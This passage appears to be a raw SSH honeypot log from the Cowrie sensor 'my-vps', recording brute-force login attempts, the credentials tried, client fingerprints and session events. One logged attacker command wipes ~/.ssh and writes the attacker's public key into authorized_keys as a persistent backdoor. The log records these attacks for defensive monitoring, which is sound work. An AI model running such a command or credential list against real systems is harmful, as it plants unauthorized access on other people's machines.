a2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:26.094053Z","src_ip":"43.159.36.188","session":"a4223f5409ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:26.220592Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:37:26.831778Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:37:26.832527Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.110222Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.111216Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.175738Z","src_ip":"43.159.36.188","session":"a4223f5409ce"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":59800,"dst_ip":"1.2.3.4","dst_port":22,"session":"60f1749fa2ae","protocol":"ssh","message":"New connection: 170.64.166.123:59800 (1.2.3.4:22) [session: 60f1749fa2ae]","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.383301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.384352Z","src_ip":"170.64.166.123","session":"60f1749fa2ae"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.437500Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.438481Z","src_ip":"43.159.36.188","session":"a4223f5409ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:27.658308Z","src_ip":"170.64.166.123","session":"60f1749fa2ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:28.794976Z","src_ip":"170.64.166.123","session":"60f1749fa2ae"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:30.071520Z","src_ip":"170.64.166.123","session":"60f1749fa2ae"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":59808,"dst_ip":"1.2.3.4","dst_port":22,"session":"1329f5e0e8e1","protocol":"ssh","message":"New connection: 170.64.166.123:59808 (1.2.3.4:22) [session: 1329f5e0e8e1]","sensor":"my-vps","timestamp":"2025-08-31T05:37:30.351448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:30.352173Z","src_ip":"170.64.166.123","session":"1329f5e0e8e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:30.632672Z","src_ip":"170.64.166.123","session":"1329f5e0e8e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:37:31.795662Z","src_ip":"170.64.166.123","session":"1329f5e0e8e1"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:32.078743Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:32.079603Z","src_ip":"170.64.166.123","session":"1329f5e0e8e1"}
{"eventid":"cowrie.session.closed","duration":"76.8","message":"Connection lost after 76.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:34.554706Z","src_ip":"212.227.125.160","session":"c08fb43f744a"}
{"eventid":"cowrie.session.closed","duration":"21.6","message":"Connection lost after 21.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:41.411513Z","src_ip":"212.227.125.160","session":"27d039a3375a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46598,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee1e571d60c1","protocol":"ssh","message":"New connection: 212.227.235.229:46598 (1.2.3.4:22) [session: ee1e571d60c1]","sensor":"my-vps","timestamp":"2025-08-31T05:37:53.730175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:37:54.478676Z","src_ip":"212.227.235.229","session":"ee1e571d60c1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:37:54.479343Z","src_ip":"212.227.235.229","session":"ee1e571d60c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54538,"dst_ip":"1.2.3.4","dst_port":22,"session":"e37c6389e1ff","protocol":"ssh","message":"New connection: 212.227.235.229:54538 (1.2.3.4:22) [session: e37c6389e1ff]","sensor":"my-vps","timestamp":"2025-08-31T05:37:54.938411Z"}
{"eventid":"cowrie.login.failed","username":"test1","password":"root123","message":"login attempt [test1/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:00.142597Z","src_ip":"212.227.235.229","session":"ee1e571d60c1"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:02.281107Z","src_ip":"212.227.235.229","session":"ee1e571d60c1"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:06.469500Z","src_ip":"212.227.235.229","session":"d4710fc6d59b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36290,"dst_ip":"1.2.3.4","dst_port":22,"session":"300fd7f5ce94","protocol":"ssh","message":"New connection: 212.227.125.160:36290 (1.2.3.4:22) [session: 300fd7f5ce94]","sensor":"my-vps","timestamp":"2025-08-31T05:38:15.313021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:38:15.826140Z","src_ip":"212.227.125.160","session":"300fd7f5ce94"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:38:15.840444Z","src_ip":"212.227.125.160","session":"300fd7f5ce94"}
{"eventid":"cowrie.session.closed","duration":"21.5","message":"Connection lost after 21.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:16.478168Z","src_ip":"212.227.235.229","session":"e37c6389e1ff"}
{"eventid":"cowrie.login.failed","username":"test1","password":"root123","message":"login attempt [test1/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:17.976330Z","src_ip":"212.227.125.160","session":"300fd7f5ce94"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:19.790594Z","src_ip":"212.227.125.160","session":"300fd7f5ce94"}
{"eventid":"cowrie.session.closed","duration":"95.3","message":"Connection lost after 95.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:26.160981Z","src_ip":"212.227.235.229","session":"d4710fc6d59b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54199,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3a9b98c26fe","protocol":"ssh","message":"New connection: 212.227.235.229:54199 (1.2.3.4:22) [session: b3a9b98c26fe]","sensor":"my-vps","timestamp":"2025-08-31T05:38:31.936525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:38:31.937654Z","src_ip":"212.227.235.229","session":"b3a9b98c26fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:38:32.102366Z","src_ip":"212.227.235.229","session":"b3a9b98c26fe"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":53604,"dst_ip":"1.2.3.4","dst_port":22,"session":"520103f86157","protocol":"ssh","message":"New connection: 43.159.36.188:53604 (1.2.3.4:22) [session: 520103f86157]","sensor":"my-vps","timestamp":"2025-08-31T05:38:32.129888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:38:32.130813Z","src_ip":"43.159.36.188","session":"520103f86157"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:38:32.375843Z","src_ip":"43.159.36.188","session":"520103f86157"}
{"eventid":"cowrie.login.failed","username":"centos","password":"qwer1234","message":"login attempt [centos/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:33.397232Z","src_ip":"43.159.36.188","session":"520103f86157"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:34.644001Z","src_ip":"43.159.36.188","session":"520103f86157"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":39310,"dst_ip":"1.2.3.4","dst_port":22,"session":"ede709427cf3","protocol":"ssh","message":"New connection: 170.64.166.123:39310 (1.2.3.4:22) [session: ede709427cf3]","sensor":"my-vps","timestamp":"2025-08-31T05:38:38.476244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:38:38.477509Z","src_ip":"170.64.166.123","session":"ede709427cf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:38:38.753554Z","src_ip":"170.64.166.123","session":"ede709427cf3"}
{"eventid":"cowrie.login.failed","username":"ttbot","password":"ttbot","message":"login attempt [ttbot/ttbot] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:39.425698Z","src_ip":"212.227.235.229","session":"b3a9b98c26fe"}
{"eventid":"cowrie.login.failed","username":"controll","password":"abc123..","message":"login attempt [controll/abc123..] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:39.893265Z","src_ip":"170.64.166.123","session":"ede709427cf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45440,"dst_ip":"1.2.3.4","dst_port":22,"session":"a38baea6355a","protocol":"ssh","message":"New connection: 212.227.235.229:45440 (1.2.3.4:22) [session: a38baea6355a]","sensor":"my-vps","timestamp":"2025-08-31T05:38:41.072897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:38:41.073869Z","src_ip":"212.227.235.229","session":"a38baea6355a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:41.170275Z","src_ip":"170.64.166.123","session":"ede709427cf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:38:41.359594Z","src_ip":"212.227.235.229","session":"a38baea6355a"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:41.413113Z","src_ip":"212.227.235.229","session":"b3a9b98c26fe"}
{"eventid":"cowrie.login.failed","username":"ankur","password":"ankur123","message":"login attempt [ankur/ankur123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:38:42.545877Z","src_ip":"212.227.235.229","session":"a38baea6355a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:38:43.834879Z","src_ip":"212.227.235.229","session":"a38baea6355a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52932,"dst_ip":"1.2.3.4","dst_port":22,"session":"a57f0a20bf2a","protocol":"ssh","message":"New connection: 212.227.235.229:52932 (1.2.3.4:22) [session: a57f0a20bf2a]","sensor":"my-vps","timestamp":"2025-08-31T05:38:53.979199Z"}
